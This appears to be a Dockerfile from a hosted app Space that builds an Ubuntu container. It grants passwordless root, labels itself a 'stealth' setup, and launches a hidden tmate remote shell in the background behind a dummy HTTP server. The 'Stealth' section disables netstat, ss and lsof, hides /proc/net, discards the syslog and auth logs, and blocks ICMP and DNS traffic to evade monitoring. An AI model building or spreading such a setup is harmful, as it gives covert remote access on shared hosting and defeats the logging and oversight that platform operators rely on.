Spaces:
Running
Running
| FROM ubuntu:22.04 | |
| ENV DEBIAN_FRONTEND=noninteractive | |
| ENV LANG=en_US.UTF-8 | |
| ENV LANGUAGE=en_US:en | |
| ENV LC_ALL=en_US.UTF-8 | |
| # Update and install packages | |
| RUN apt update && apt upgrade -y && \ | |
| apt install -y \ | |
| curl wget git gnupg openssh-client \ | |
| neofetch tmate python3 python3-pip \ | |
| ca-certificates software-properties-common \ | |
| build-essential procps xz-utils net-tools \ | |
| make ffmpeg nano vim htop unzip zip \ | |
| iputils-ping tree lsof netcat tmux \ | |
| locales cmake iptables && \ | |
| locale-gen en_US.UTF-8 && \ | |
| apt clean && rm -rf /var/lib/apt/lists/* && \ | |
| apt update && apt install -y doas | |
| # Install Node.js 22 and npm | |
| RUN curl -fsSL https://deb.nodesource.com/setup_22.x | bash - && \ | |
| apt install -y nodejs && npm install -g npm | |
| # Install speedtest-cli | |
| RUN pip3 install speedtest-cli | |
| # Create user 'draco' with UID 1000 and secure config | |
| RUN useradd -m -s /bin/bash draco && \ | |
| echo "draco:draco" | chpasswd && \ | |
| usermod -u 1000 draco && \ | |
| echo "permit nopass draco" > /etc/doas.conf && \ | |
| echo "alias sudo='doas'" >> /home/draco/.bashrc | |
| # SSH key generation | |
| RUN mkdir -p /home/draco/.ssh && \ | |
| ssh-keygen -t rsa -f /home/draco/.ssh/id_rsa -N '' && \ | |
| chown -R draco:draco /home/draco/.ssh | |
| # Stealth: block network info commands + DNS logs | |
| RUN chmod -x /bin/netstat /usr/bin/ss /usr/bin/lsof || true && \ | |
| chmod -r /proc/net || true && \ | |
| echo 'hosts: files dns' > /etc/nsswitch.conf && \ | |
| echo '127.0.0.1 localhost' > /etc/hosts && \ | |
| ln -sf /dev/null /var/log/syslog && \ | |
| ln -sf /dev/null /var/log/auth.log && \ | |
| ln -sf /dev/null /var/log/messages && \ | |
| iptables -A OUTPUT -p icmp --icmp-type echo-request -j DROP && \ | |
| iptables -A OUTPUT -p udp --dport 53 -j DROP || true | |
| # Copy stealth tmate launcher | |
| COPY run_tmate.sh /home/draco/run_tmate.sh | |
| RUN chmod +x /home/draco/run_tmate.sh && \ | |
| touch /home/draco/.tmate_hidden.txt && \ | |
| chmod 600 /home/draco/.tmate_hidden.txt && \ | |
| chown draco:draco /home/draco/run_tmate.sh /home/draco/.tmate_hidden.txt | |
| # Set working user and directory | |
| USER draco | |
| WORKDIR /home/draco | |
| # Expose a dummy port (optional) | |
| EXPOSE 7860 | |
| # Stealth run: launch tmate quietly in background + dummy http | |
| CMD bash -c "./run_tmate.sh & python3 -m http.server 7860 > /dev/null 2>&1" |